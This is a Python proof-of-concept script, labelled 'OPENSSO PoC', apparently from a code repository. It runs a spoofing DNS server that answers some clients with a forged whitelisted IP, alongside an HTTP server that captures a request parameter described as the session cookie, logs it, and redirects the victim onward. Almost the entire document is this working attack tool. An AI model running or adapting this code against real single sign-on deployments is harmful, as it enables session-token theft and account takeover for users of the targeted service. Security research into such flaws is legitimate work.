README.md
Rendering markdown...
import socket
import dnslib
import multiprocessing
import sys
import argparse
class DNSERVER():
def __init__(self, blacklist=[], interface="0.0.0.0", port=53, ipToSpoof="127.0.0.1", realIP="127.0.0.1"):
self.running = True
self.blacklist = blacklist
self.interface = interface
self.port = port
self.realIP = realIP
self.ipToSpoof = ipToSpoof
self.sDNS = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def start(self):
self.sDNS.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sDNS.bind((self.interface, self.port))
print("[*] Started DNS server on port {}".format(self.port))
while self.running:
data, addr = self.sDNS.recvfrom(512)
parsedDNS = dnslib.DNSRecord.parse(data)
# We send fake IP to adAS
if(addr[0] in self.blacklist):
ip = self.ipToSpoof
else:
ip = self.realIP
print("[DNS] Response: {} -> {}".format(parsedDNS.questions[0].qname, ip))
response = dnslib.DNSRecord(dnslib.DNSHeader(qr=1,aa=1,ra=1,id=parsedDNS.header.id), q=dnslib.DNSQuestion(parsedDNS.questions[0].qname), a=dnslib.RR(parsedDNS.questions[0].qname,rdata=dnslib.A(ip)))
self.sDNS.sendto(response.pack(), addr)
self.sDNS.close()
def stop(self):
try:
self.running = False
self.sDNS.close()
print("[*] DNS Server killed")
except Exception as e:
print("[-] Error stopping DNS server, {}".format(e))
class HTTPSERVER():
def __init__(self, interface="0.0.0.0", port=80, redirectUrl="http://github.com/wocanilo"):
self.running = True
self.interface = interface
self.port = port
self.redirectUrl = redirectUrl
self.sHTTP = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def start(self):
self.sHTTP.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sHTTP.bind((self.interface, self.port))
print("[*] Started HTTP server on port {}".format(self.port))
while self.running:
self.sHTTP.listen(2)
conn, addr = self.sHTTP.accept()
data = conn.recv(1024)
# First parameter is the session cookie
try:
query = data.decode("UTF-8").rsplit()[1].split("?")[1].split("=")
print("Captured parameter {} = {}".format(query[0], query[1]))
except:
print("[HTTP] Bad request parameters")
query = ["", ""]
# We redirect the user to the real page with the cookie
conn.sendall("HTTP/1.1 301 Moved Permanently\r\nLocation: {}?{}={}\r\n\r\n".format(self.redirectUrl, query[0], query[1]).encode("UTF-8"))
conn.close()
self.sHTTP.close()
def stop(self):
try:
self.running = False
self.sHTTP.shutdown(socket.SHUT_RDWR)
self.sHTTP.close()
print("[*] HTTP Server killed")
except Exception as e:
print("[-] Error stopping HTTP server, {}".format(e))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='OPENSSO PoC')
parser.add_argument('ipToSpoof', type=str, help='whitelisted OPENSSO IP')
parser.add_argument('realIP', type=str, help="server real IP")
parser.add_argument('redirectUrl', help="URL to redirect users after Auth")
parser.add_argument('ipBlacklist', nargs='+', help="list of blacklisted IPs")
parser.add_argument('--interface', default="0.0.0.0", help='listening interface of the DNS and HTTP server (default: 0.0.0.0)')
parser.add_argument('--httpPort', default=80, type=int, help='HTTP server port (default: 80)')
parser.add_argument('--dnsPort', default=53, type=int, help='DNS server port (default: 53)')
args = parser.parse_args()
if(args.ipToSpoof != None and args.redirectUrl != None and args.ipBlacklist != None):
httpServer = HTTPSERVER(args.interface, args.httpPort, args.redirectUrl)
dnsServer = DNSERVER(args.ipBlacklist, args.interface, args.dnsPort, args.ipToSpoof, args.realIP)
dns = multiprocessing.Process(target=dnsServer.start)
http = multiprocessing.Process(target=httpServer.start)
dns.start()
http.start()
input("")
httpServer.stop()
dnsServer.stop()
dns.terminate()
http.terminate()
else:
print(args.ipBlacklist)